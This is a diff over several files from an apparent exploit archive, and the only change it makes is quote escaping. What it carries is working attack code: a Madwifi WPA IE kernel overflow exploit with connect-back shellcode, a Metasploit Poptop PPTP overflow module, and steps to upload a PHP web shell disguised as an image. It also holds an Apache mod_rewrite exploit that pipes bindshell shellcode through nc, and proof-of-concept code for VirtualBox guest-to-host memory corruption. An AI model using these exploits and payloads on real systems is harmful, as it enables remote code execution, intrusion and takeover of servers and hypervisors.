 #define JUMP_OFFSET_PATCH 1
-char jmp_back[]="\xeb\x00";
+char jmp_back[]=\"\\xeb\\x00\";
 /* ----------------------------------- */
 void usage(char *prog)
 {
-  printf("[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\n", prog);
+  printf(\"[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\\n\", prog);
 }
 unsigned char *build_frame()
@ -203,10 +203,10 @@ unsigned char *build_frame()
  unsigned int hsb = sizeof(ring0_code)-1;
  unsigned int lsb =  SHELLCODE_SPACE - hsb;
-  printf("[*][low-kcode]: %d\n[*][high-ucode]: %d\n", 
+  printf(\"[*][low-kcode]: %d\\n[*][high-ucode]: %d\\n\", 
         lsb, hsb);
-  printf("[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\n", 
+  printf(\"[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\\n\", 
         sizeof(u_code)-1, sizeof(ring0_code)-1);
  /* fix jump */
@ -217,11 +217,11 @@ unsigned char *build_frame()
  unsigned int sub = 5 + (sizeof(u_code)-1);
  FIX_BYTE(ring0_code, SUB_OFFSET_PATCH, sub);
-  printf("[*][payload space]: %d\n", PAYLOAD_SPACE);
+  printf(\"[*][payload space]: %d\\n\", PAYLOAD_SPACE);
  /* fix beacon_80211_wpa: WPA len */
  FIX_BYTE(beacon_80211_wpa, WPA_LEN_OFFSET, PAYLOAD_SPACE + 6);
-  printf("[*][beacon_WPA_IE_lenght]: %u\n", 
+  printf(\"[*][beacon_WPA_IE_lenght]: %u\\n\", 
                  (unsigned char)beacon_80211_wpa[WPA_LEN_OFFSET]);
  /* fill frame */
@ -256,43 +256,43 @@ unsigned char *build_frame()
 void print_frame(unsigned char *frame, unsigned int size)
 {
  int i;
-  printf("\n[printing frame - start]\n  ");
+  printf(\"\\n[printing frame - start]\\n  \");
  for(i=1; i<=size; i++)
  {
-    printf("%02x ", frame[i-1]);
+    printf(\"%02x \", frame[i-1]);
    if((i % 16) == 0)
-      printf("\n  ");
+      printf(\"\\n  \");
  }
-  printf("\n[printing frame - end]\n");
+  printf(\"\\n[printing frame - end]\\n\");
 }
 void parse_arg(int argc, char **argv)
 {
  int opt;
  struct in_addr in;
-  while( (opt=getopt(argc, argv, "j:i:a:p:d:g:")) != EOF)
+  while( (opt=getopt(argc, argv, \"j:i:a:p:d:g:\")) != EOF)
  {
    switch(opt)
    {
-      case 'j':
+      case \'j\':
        jmp_address = strtoll(optarg, NULL, 16);
        break;
-      case 'a':
+      case \'a\':
        ip = strdup(optarg);
        inet_aton(ip, &in); 
        FIX_DWORD(u_code, IP_OFFSET, ~(in.s_addr));    
        break;
-      case 'p':
+      case \'p\':
        port = atoi(optarg);
        FIX_WORD(u_code, PORT_OFFSET, port); 
        break;
-      case 'd':
+      case \'d\':
        driver = strdup(optarg);
        break;
-      case 'i':
+      case \'i\':
        iface = strdup(optarg);
        break;
-      case 'g':
+      case \'g\':
        pad_space = atoi(optarg);
        break;
      default:
@ -318,10 +318,10 @@ int main(int argc, char *argv[])
    exit(1);
  }
-  printf( "\n\nMadwifi 0.9.2 WPA/RSN IE buffer overflow\n\t exploit code: sgrakkyu <at> antifork.org\n"
+  printf( \"\\n\\nMadwifi 0.9.2 WPA/RSN IE buffer overflow\\n\\t exploit code: sgrakkyu <at> antifork.org\\n\"
-          "-------------------- **** ------------------\n"
+          \"-------------------- **** ------------------\\n\"
-          "[opt-ip]: %s\n[opt-port]: %d\n[opt-iface]: %s\n[opt-driver]: %s\n[opt-jump]: 0x%08x\n[pad]: %d\n"
+          \"[opt-ip]: %s\\n[opt-port]: %d\\n[opt-iface]: %s\\n[opt-driver]: %s\\n[opt-jump]: 0x%08x\\n[pad]: %d\\n\"
-          "-------------------- **** ------------------\n\n",
+          \"-------------------- **** ------------------\\n\\n\",
          ip, port, iface, driver, jmp_address, pad_space);
  unsigned char *frame = build_frame();
@ -333,30 +333,30 @@ int main(int argc, char *argv[])
  /* Validate the driver name specified */
  if (drivertype == INJ_NODRIVER) 
  {
-    fprintf(stderr, "Driver name not recognized.\n");
+    fprintf(stderr, \"Driver name not recognized.\\n\");
    return -1;
  }
  if (tx80211_init(&in_tx, iface, drivertype) < 0) {
-    fprintf(stderr, "Error initializing drive \"%s\".\n", argv[1]);
+    fprintf(stderr, \"Error initializing drive \\\"%s\\\".\\n\", argv[1]);
    return -1;
  }
  if ((tx80211_getcapabilities(&in_tx) & TX80211_CAP_CTRL) == 0) 
  {
-    fprintf(stderr, "Driver does not support transmitting control frames.\n");
+    fprintf(stderr, \"Driver does not support transmitting control frames.\\n\");
    return -1;
  }
  if (tx80211_setchannel(&in_tx, CHANNEL) < 0) 
  {
-    fprintf(stderr, "Error setting channel.\n");
+    fprintf(stderr, \"Error setting channel.\\n\");
    return 1;
  }
  if (tx80211_open(&in_tx) < 0) 
  {
-    fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname);
+    fprintf(stderr, \"Unable to open interface %s.\\n\", in_tx.ifname);
    return 1;
  }
@ -364,15 +364,15 @@ int main(int argc, char *argv[])
  in_packet.packet = frame;
  in_packet.plen = TOTAL_PACKET_LEN;
-  printf("[sending packets]: about 10 a second\n");
+  printf(\"[sending packets]: about 10 a second\\n\");
  while(i < 10000)
  {
    /* Transmit the packet */
    if (tx80211_txpacket(&in_tx, &in_packet) < 0) 
    {
-      fprintf(stderr, "Unable to transmit packet.\n");
+      fprintf(stderr, \"Unable to transmit packet.\\n\");
-      perror("txpacket");
+      perror(\"txpacket\");
      return 1;
    }
    i++;
--- a/platforms/linux/remote/9952.rb
+++ b/platforms/linux/remote/9952.rb
@ -10,7 +10,7 @@
 ##
-require 'msf/core'
+require \'msf/core\'
 class Metasploit3 < Msf::Exploit::Remote
@ -20,8 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,	
-			'Name'           => 'Poptop Negative Read Overflow',
+			\'Name\'           => \'Poptop Negative Read Overflow\',
-			'Description'    => %q{
+			\'Description\'    => %q{
 	 This is an exploit for the Poptop negative read overflow.  This will
    work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
    currently do not have a good way to detect Poptop versions.
@ -32,40 +32,40 @@ class Metasploit3 < Msf::Exploit::Remote
    Using the current method of exploitation, our socket will be closed
    before we have the ability to run code, preventing the use of Findsock.
 			},
-			'Author'         => 'spoonm',
+			\'Author\'         => \'spoonm\',
-			'License'        => MSF_LICENSE,
+			\'License\'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
+			\'Version\'        => \'$Revision$\',
-			'References'     =>
+			\'References\'     =>
 				[
-					['CVE', '2003-0213'],
+					[\'CVE\', \'2003-0213\'],
-					['OSVDB', '3293'],
+					[\'OSVDB\', \'3293\'],
-					['URL',   'http://securityfocus.com/archive/1/317995'],
+					[\'URL\',   \'http://securityfocus.com/archive/1/317995\'],
-					['URL',   'http://www.freewebs.com/blightninjas/'],
+					[\'URL\',   \'http://www.freewebs.com/blightninjas/\'],
 				],
-			'Privileged'     => true,
+			\'Privileged\'     => true,
-			'Payload'        =>
+			\'Payload\'        =>
 				{
 					# Payload space is dynamically determined
-					'MinNops'         => 16,
+					\'MinNops\'         => 16,
-					'StackAdjustment' => -1088
+					\'StackAdjustment\' => -1088
 				},
-			'SaveRegisters'  => [ 'esp' ],
+			\'SaveRegisters\'  => [ \'esp\' ],
-			'Platform'       => 'linux',
+			\'Platform\'       => \'linux\',
-			'Arch'           => ARCH_X86,
+			\'Arch\'           => ARCH_X86,
-			'Targets'        => 
+			\'Targets\'        => 
 				[
-					['Linux Bruteforce', 
+					[\'Linux Bruteforce\', 
-						{ 'Bruteforce' => 
+						{ \'Bruteforce\' => 
 							{
-								'Start'  => { 'Ret' => 0xbffffa00 },
+								\'Start\'  => { \'Ret\' => 0xbffffa00 },
-								'Stop'   => { 'Ret' => 0xbffff000 },
+								\'Stop\'   => { \'Ret\' => 0xbffff000 },
-								'Step'   => 0
+								\'Step\'   => 0
 							}
 						}
 					],
 				],
-			'DefaultTarget'  => 0,
+			\'DefaultTarget\'  => 0,
-			'DisclosureDate' => 'Apr 9 2003'))
+			\'DisclosureDate\' => \'Apr 9 2003\'))
 		register_options(
 			[
@ -74,26 +74,26 @@ class Metasploit3 < Msf::Exploit::Remote
 		register_advanced_options(
 			[
-				OptInt.new("PreReturnLength", [ true, "Space before we hit the return address.  Affects PayloadSpace.", 220 ]),
+				OptInt.new(\"PreReturnLength\", [ true, \"Space before we hit the return address.  Affects PayloadSpace.\", 220 ]),
-				OptInt.new("RetLength",       [ true, "Length of returns after payload.", 32 ]),
+				OptInt.new(\"RetLength\",       [ true, \"Length of returns after payload.\", 32 ]),
-				OptInt.new("ExtraSpace",      [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows).  I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
+				OptInt.new(\"ExtraSpace\",      [ true, \"The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn\'t really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows).  I\'ve had successful exploitation with this set to 154, but nothing over 128 is suggested.\", 0 ]),
-				OptString.new("Hostname",     [ false, "PPTP Packet hostname", '' ]),
+				OptString.new(\"Hostname\",     [ false, \"PPTP Packet hostname\", \'\' ]),
-				OptString.new("Vendor",       [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),
+				OptString.new(\"Vendor\",       [ true, \"PPTP Packet vendor\", \'Microsoft Windows NT\' ]),
 			], self.class)
 	end
 	# Dynamic payload space calculation
 	def payload_space
-		datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i
+		datastore[\'PreReturnLength\'].to_i + datastore[\'ExtraSpace\'].to_i
 	end
 	def build_packet(length)
-		[length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') +
+		[length, 1, 0x1a2b3c4d, 1, 0].pack(\'nnNnn\') +
-		[1,0].pack('cc') +
+		[1,0].pack(\'cc\') +
-		[0].pack('n') +
+		[0].pack(\'n\') +
-		[1,1,0,2600].pack('NNnn') +
+		[1,1,0,2600].pack(\'NNnn\') +
-		datastore['Hostname'].ljust(64, "\x00") +
+		datastore[\'Hostname\'].ljust(64, \"\\x00\") +
-		datastore['Vendor'].ljust(64, "\x00")
+		datastore[\'Vendor\'].ljust(64, \"\\x00\")
 	end
 	def check
@ -111,13 +111,13 @@ class Metasploit3 < Msf::Exploit::Remote
 	def brute_exploit(addrs)
 		connect
-		print_status("Trying #{"%.8x" % addrs['Ret']}...")
+		print_status(\"Trying #{\"%.8x\" % addrs[\'Ret\']}...\")
 		# Construct the evil length packet
 		packet = 
 			build_packet(1) +
 			payload.encoded +
-			([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))
+			([addrs[\'Ret\']].pack(\'V\') * (datastore[\'RetLength\'] / 4))
 		sock.put(packet)
--- a/platforms/linux/webapps/10427.txt
+++ b/platforms/linux/webapps/10427.txt
@ -16,17 +16,17 @@
 | 1- First signup in the forum by going here http://localhost/[script]/base.php?page=inscription.php
 |
 |
-| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click "modfier"
+| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click \"modfier\"
 |
 |
-| 3-Now upload your shell in "php.jpg" format
+| 3-Now upload your shell in \"php.jpg\" format
 |
 |
-| 4-Finally do a right click in the icon situated in "Apparence" then copy the link of your shell.
+| 4-Finally do a right click in the icon situated in \"Apparence\" then copy the link of your shell.
 |
 [-]#############################################################
 |
-|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's
+|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim\'s
 |
 [-]#############################################################
--- a/platforms/multiple/dos/2237.sh
+++ b/platforms/multiple/dos/2237.sh
@ -3,12 +3,12 @@
 # Vulnerability discovered by Mark Dowd.
 # CVE-2006-3747
 # 
-# by jack <jack\x40gulcas\x2Eorg>
+# by jack <jack\\x40gulcas\\x2Eorg>
 # 2006-08-20
 #
 # Thx to xuso for help me with the shellcode.
 #
-# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
+# I suppose that you\'ve the \"RewriteRule kung/(.*) $1\" rule if not
 # you must recalculate adressess.
 #
 # Shellcode is based on Taeho Oh bindshell on port 30464 and modified
@ -19,26 +19,26 @@
 #
 # Gulcas rulez :P
-echo -e "mod_rewrite apache off-by-one overflow"
+echo -e \"mod_rewrite apache off-by-one overflow\"
-echo    "by jack <jack\x40gulcas\x2eorg>\n\n"
+echo    \"by jack <jack\\x40gulcas\\x2eorg>\\n\\n\"
 if [ $# -ne 1 ] ; then
-  echo "Usage: $0 webserver"
+  echo \"Usage: $0 webserver\"
  exit
 fi
 host=$1
-echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
+echo -ne \"GET /kung/ldap://localhost/`perl -e \'print \"%90\"x128\'`%89%e6\\
-%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
+%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\\
-%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
+%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\\
-%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
+%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\\
-%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
+%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\\
-%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
+%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\\
-%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
+%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\\
-%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
+%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\\
-%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
+%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\
-%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
+%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\\r\\n\\
-Host: $host\r\n\r\n" | nc $host 80
+Host: $host\\r\\n\\r\\n\" | nc $host 80
 # milw0rm.com [2006-08-21]
--- a/platforms/multiple/dos/32208.txt
+++ b/platforms/multiple/dos/32208.txt
@ -38,7 +38,7 @@ targeted at server, desktop and embedded use.
 VirtualBox provides -among many other features- 3D Acceleration for
 guest machines
 through its Guest Additions. This feature allows guest machines to use
-the host machine's
+the host machine\'s
 GPU to render 3D graphics based on then OpenGL or Direct3D APIs.
 Multiple memory corruption vulnerabilities have been found in the code
@ -95,13 +95,13 @@ corruption vulnerabilities, as described below.
 [CVE-2014-0981] The first vulnerability is caused by a *design flaw* in
 Chromium. The Chromium server makes use
-of "*network pointers*". As defined in Chromium's documentation,
+of \"*network pointers*\". As defined in Chromium\'s documentation,
-'"Network pointers are
+\'\"Network pointers are
 simply memory addresses that reside on another machine.[...] The
 networking layer will then
-take care of writing the payload data to the specified address."'[2]
+take care of writing the payload data to the specified address.\"\'[2]
-So the Chromium's server code, which runs in the context of the
+So the Chromium\'s server code, which runs in the context of the
 VirtualBox hypervisor
 in the Host OS, provides a write-what-where memory corruption primitive
 *by design*, which
@ -110,9 +110,9 @@ data in the hypervisor process
 from within a virtual machine.
 This is the code of the vulnerable function [file
-'src/VBox/GuestHost/OpenGL/util/net.c'], which can
+\'src/VBox/GuestHost/OpenGL/util/net.c\'], which can
-be reached by sending a 'CR_MESSAGE_READBACK' message to the
+be reached by sending a \'CR_MESSAGE_READBACK\' message to the
-'VBoxSharedCrOpenGL' service:
+\'VBoxSharedCrOpenGL\' service:
 /-----
@ -139,12 +139,12 @@ crNetRecvReadback( CRMessageReadback *rb, unsigned int len )
 -----/
-Note that 'rb' points to a 'CRMessageReadback' structure, which is fully
+Note that \'rb\' points to a \'CRMessageReadback\' structure, which is fully
 controlled by the
 application running inside a VM that is sending OpenGL rendering
 commands to the Host side.
-The 'len' parameter is also fully controlled from the Guest side, so
+The \'len\' parameter is also fully controlled from the Guest side, so
-it's possible to:
+it\'s possible to:
   1. decrement the value stored at any memory address within the
 address space of the hypervisor.
@ -154,13 +154,13 @@ the hypervisor.
 7.2. *VirtualBox crNetRecvWriteback Memory Corruption Vulnerability*
 [CVE-2014-0982] The second vulnerability is closely related to the first
-one, and it's also caused by Chromium's
+one, and it\'s also caused by Chromium\'s
-"*network pointers*".
+\"*network pointers*\".
 This is the code of the vulnerable function [file
-'src/VBox/GuestHost/OpenGL/util/net.c'], which can
+\'src/VBox/GuestHost/OpenGL/util/net.c\'], which can
-be reached by sending a 'CR_MESSAGE_WRITEBACK' message to the
+be reached by sending a \'CR_MESSAGE_WRITEBACK\' message to the
-'VBoxSharedCrOpenGL' service:
+\'VBoxSharedCrOpenGL\' service:
 /-----
@ -178,10 +178,10 @@ crNetRecvWriteback( CRMessageWriteback *wb )
 -----/
-Note that 'rb' points to a 'CRMessageWriteback' structure, which is
+Note that \'rb\' points to a \'CRMessageWriteback\' structure, which is
 fully controlled by the
 application running inside a VM that is sending OpenGL rendering
-commands to the Host side, so it's possible to
+commands to the Host side, so it\'s possible to
 decrement the value stored at any memory address within the address
 space of the hypervisor.
@ -192,11 +192,11 @@ Vulnerability*
 [CVE-2014-0983] When an OpenGL application running inside a VM sends
 rendering commands (in the form of opcodes + data for those opcodes)
 through
-a 'CR_MESSAGE_OPCODES' message, the Chromium server will handle them in
+a \'CR_MESSAGE_OPCODES\' message, the Chromium server will handle them in
-the 'crUnpack' function.
+the \'crUnpack\' function.
-The code for the 'crUnpack' function is automatically generated by the
+The code for the \'crUnpack\' function is automatically generated by the
 Python script located
-at 'src/VBox/HostServices/SharedOpenGL/unpacker/unpack.py'.
+at \'src/VBox/HostServices/SharedOpenGL/unpacker/unpack.py\'.
 This function is basically a big switch statement dispatching different
 functions according to the opcode being processed:
@ -212,7 +212,7 @@ void crUnpack( const void *data, const void *opcodes,
    for (i = 0 ; i < num_opcodes ; i++)
    {
-        /*crDebug("Unpacking opcode \%d", *unpack_opcodes);*/
+        /*crDebug(\"Unpacking opcode \\%d\", *unpack_opcodes);*/
        switch( *unpack_opcodes )
        {
            case CR_ALPHAFUNC_OPCODE: crUnpackAlphaFunc(); break;
@ -222,9 +222,9 @@ void crUnpack( const void *data, const void *opcodes,
 -----/
-When the opcode being processed is 'CR_VERTEXATTRIB4NUBARB_OPCODE'
+When the opcode being processed is \'CR_VERTEXATTRIB4NUBARB_OPCODE\'
-('0xEA'),
+(\'0xEA\'),
-the function to be invoked is 'crUnpackVertexAttrib4NubARB':
+the function to be invoked is \'crUnpackVertexAttrib4NubARB\':
 /-----
@ -235,9 +235,9 @@ break;
 -----/
-The 'crUnpackVertexAttrib4NubARB' function reads 5 values from the
+The \'crUnpackVertexAttrib4NubARB\' function reads 5 values from the
 opcode data sent by the Chromium client,
-and just invokes 'cr_unpackDispatch.VertexAttrib4NubARB' with those 5
+and just invokes \'cr_unpackDispatch.VertexAttrib4NubARB\' with those 5
 values as arguments:
@ -255,11 +255,11 @@ static void crUnpackVertexAttrib4NubARB(void)
 -----/
-'VertexAttrib4NubARB' is a function pointer in a dispatch table, and
+\'VertexAttrib4NubARB\' is a function pointer in a dispatch table, and
 points to the function
-'crServerDispatchVertexAttrib4NubARB', whose code is generated by the
+\'crServerDispatchVertexAttrib4NubARB\', whose code is generated by the
 Python script located at
-'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py':
+\'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py\':
 /-----
@ -273,11 +273,11 @@ z, w );
 -----/
-Note that the 'index' parameter, which is a 4-byte integer coming from
+Note that the \'index\' parameter, which is a 4-byte integer coming from
 an untrusted source (the opcode data
 sent by the Chromium client from the VM), is used as an index within the
-'cr_server.current.c.vertexAttrib.ub4'
+\'cr_server.current.c.vertexAttrib.ub4\'
-array in order to write 'cr_unpackData' (which is a pointer to the
+array in order to write \'cr_unpackData\' (which is a pointer to the
 attacker-controlled opcode data), without
 validating that the index is within the bounds of the array.
 This issue can be leveraged to corrupt arbitrary memory with a pointer
@ -285,7 +285,7 @@ to attacker-controlled data.
 Also note that *the same vulnerability affects several functions* whose
 code is generated by the
-'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py'
+\'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py\'
 Python script:
@ -324,15 +324,15 @@ crServerDispatchVertexAttrib4sARB
 /-----
-#include "stdafx.h"
+#include \"stdafx.h\"
 #include <windows.h>
-#include "vboxguest2.h"
+#include \"vboxguest2.h\"
-#include "vboxguest.h"
+#include \"vboxguest.h\"
-#include "err.h"
+#include \"err.h\"
-#include "vboxcropenglsvc.h"
+#include \"vboxcropenglsvc.h\"
-#include "cr_protocol.h"
+#include \"cr_protocol.h\"
-#define VBOXGUEST_DEVICE_NAME "\\\\.\\VBoxGuest"
+#define VBOXGUEST_DEVICE_NAME \"\\\\\\\\.\\\\VBoxGuest\"
 HANDLE open_device(){
@ -345,10 +345,10 @@ HANDLE open_device(){
                            NULL);
    if (hDevice == INVALID_HANDLE_VALUE){
-        printf("[-] Could not open device %s .\n", VBOXGUEST_DEVICE_NAME);
+        printf(\"[-] Could not open device %s .\\n\", VBOXGUEST_DEVICE_NAME);
        exit(EXIT_FAILURE);
    }
-    printf("[+] Handle to %s: 0x%X\n", VBOXGUEST_DEVICE_NAME, hDevice);
+    printf(\"[+] Handle to %s: 0x%X\\n\", VBOXGUEST_DEVICE_NAME, hDevice);
    return hDevice;
@ -362,24 +362,24 @@ uint32_t do_connect(HANDLE hDevice){
    memset(&info, 0, sizeof(info));
    info.Loc.type = VMMDevHGCMLoc_LocalHost_Existing;
-    strcpy(info.Loc.u.host.achName, "VBoxSharedCrOpenGL");
+    strcpy(info.Loc.u.host.achName, \"VBoxSharedCrOpenGL\");
    rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CONNECT, &info,
 sizeof(info), &info, sizeof(info), &cbReturned, NULL);
    if (!rc){
-        printf("ERROR: DeviceIoControl failed in function do_connect()!
+        printf(\"ERROR: DeviceIoControl failed in function do_connect()!
-LastError: %d\n", GetLastError());
+LastError: %d\\n\", GetLastError());
        exit(EXIT_FAILURE);
    }
    if (info.result == VINF_SUCCESS){
-        printf("HGCM connect was successful: client id =0x%x\n",
+        printf(\"HGCM connect was successful: client id =0x%x\\n\",
 info.u32ClientID);
    }
    else{
        //If 3D Acceleration is disabled, info.result value will be -2900.
-        printf("[-] HGCM connect failed. Result: %d (Is 3D Acceleration
+        printf(\"[-] HGCM connect failed. Result: %d (Is 3D Acceleration
-enabled??)\n", info.result);
+enabled??)\\n\", info.result);
        exit(EXIT_FAILURE);
    }
    return info.u32ClientID;
@ -393,20 +393,20 @@ void do_disconnect(HANDLE hDevice, uint32_t u32ClientID){
    memset(&info, 0, sizeof(info));
    info.u32ClientID = u32ClientID;
-    printf("Sending VBOXGUEST_IOCTL_HGCM_DISCONNECT message...\n");
+    printf(\"Sending VBOXGUEST_IOCTL_HGCM_DISCONNECT message...\\n\");
    rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_DISCONNECT,
 &info, sizeof(info), &info, sizeof(info), &cbReturned, NULL);
    if (!rc){
-        printf("ERROR: DeviceIoControl failed in function
+        printf(\"ERROR: DeviceIoControl failed in function
-do_disconnect()! LastError: %d\n", GetLastError());
+do_disconnect()! LastError: %d\\n\", GetLastError());
        exit(EXIT_FAILURE);
    }
    if (info.result == VINF_SUCCESS){
-        printf("HGCM disconnect was successful.\n");
+        printf(\"HGCM disconnect was successful.\\n\");
    }
    else{
-        printf("[-] HGCM disconnect failed. Result: %d\n", info.result);
+        printf(\"[-] HGCM disconnect failed. Result: %d\\n\", info.result);
        exit(EXIT_FAILURE);
    }
@ -433,16 +433,16 @@ void set_version(HANDLE hDevice, uint32_t u32ClientID){
 sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);
    if (!rc){
-        printf("ERROR: DeviceIoControl failed in function set_version()!
+        printf(\"ERROR: DeviceIoControl failed in function set_version()!
-LastError: %d\n", GetLastError());
+LastError: %d\\n\", GetLastError());
        exit(EXIT_FAILURE);
    }
    if (parms.hdr.result == VINF_SUCCESS){
-        printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
+        printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned);
    }
    else{
-        printf("Host didn't accept our version.\n");
+        printf(\"Host didn\'t accept our version.\\n\");
        exit(EXIT_FAILURE);
    }
 }
@ -466,16 +466,16 @@ void set_pid(HANDLE hDevice, uint32_t u32ClientID){
 sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);
    if (!rc){
-        printf("ERROR: DeviceIoControl failed in function set_pid()!
+        printf(\"ERROR: DeviceIoControl failed in function set_pid()!
-LastError: %d\n", GetLastError());
+LastError: %d\\n\", GetLastError());
        exit(EXIT_FAILURE);
    }
    if (parms.hdr.result == VINF_SUCCESS){
-        printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
+        printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned);
    }
    else{
-        printf("Host didn't like our PID %d\n", GetCurrentProcessId());
+        printf(\"Host didn\'t like our PID %d\\n\", GetCurrentProcessId());
        exit(EXIT_FAILURE);
    }
@ -501,7 +501,7 @@ void trigger_message_readback(HANDLE hDevice, uint32_t u32ClientID){
    *((DWORD *)&msg.readback_ptr.ptrSize) = 0x99999999;
    memcpy(&mybuf, &msg, sizeof(msg));
-    strcpy(mybuf + sizeof(msg), "Hi hypervisor!");
+    strcpy(mybuf + sizeof(msg), \"Hi hypervisor!\");
    memset(&parms, 0, sizeof(parms));
    parms.hdr.result      = VERR_WRONG_ORDER;
@ -521,16 +521,16 @@ memcpy: sizeof(mybuf) - 0x18
 sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);
    if (!rc){
-        printf("ERROR: DeviceIoControl failed in function
+        printf(\"ERROR: DeviceIoControl failed in function
-trigger_message_readback()!. LastError: %d\n", GetLastError());
+trigger_message_readback()!. LastError: %d\\n\", GetLastError());
        exit(EXIT_FAILURE);
    }
    if (parms.hdr.result == VINF_SUCCESS){
-        printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
+        printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned);
    }
    else{
-        printf("HGCM Call failed. Result: %d\n", parms.hdr.result);
+        printf(\"HGCM Call failed. Result: %d\\n\", parms.hdr.result);
        exit(EXIT_FAILURE);
    }
 }
@ -553,7 +553,7 @@ void trigger_message_writeback(HANDLE hDevice, uint32_t u32ClientID){
    *((DWORD *)msg.writeback.writeback_ptr.ptrSize) = 0xAABBCCDD;
    memcpy(&mybuf, &msg, sizeof(msg));
-    strcpy(mybuf + sizeof(msg), "dummy");
+    strcpy(mybuf + sizeof(msg), \"dummy\");
    memset(&parms, 0, sizeof(parms));
    parms.hdr.result      = VERR_WRONG_ORDER;
@ -573,16 +573,16 @@ void trigger_message_writeback(HANDLE hDevice, uint32_t u32ClientID){
 sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);
    if (!rc){
-        printf("ERROR: DeviceIoControl failed in function
+        printf(\"ERROR: DeviceIoControl failed in function
-trigger_message_writeback()! LastError: %d\n", GetLastError());
+trigger_message_writeback()! LastError: %d\\n\", GetLastError());
        exit(EXIT_FAILURE);
    }
    if (parms.hdr.result == VINF_SUCCESS){
-        printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
+        printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned);
    }
    else{
-        printf("HGCM Call failed. Result: %d\n", parms.hdr.result);
+        printf(\"HGCM Call failed. Result: %d\\n\", parms.hdr.result);
        exit(EXIT_FAILURE);
    }
@ -646,16 +646,16 @@ negative index used to trigger the memory corruption
 sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);
    if (!rc){
-        printf("ERROR: DeviceIoControl failed in function
+        printf(\"ERROR: DeviceIoControl failed in function
-trigger_opcode_0xea()! LastError: %d\n", GetLastError());
+trigger_opcode_0xea()! LastError: %d\\n\", GetLastError());
        exit(EXIT_FAILURE);
    }
    if (parms.hdr.result == VINF_SUCCESS){
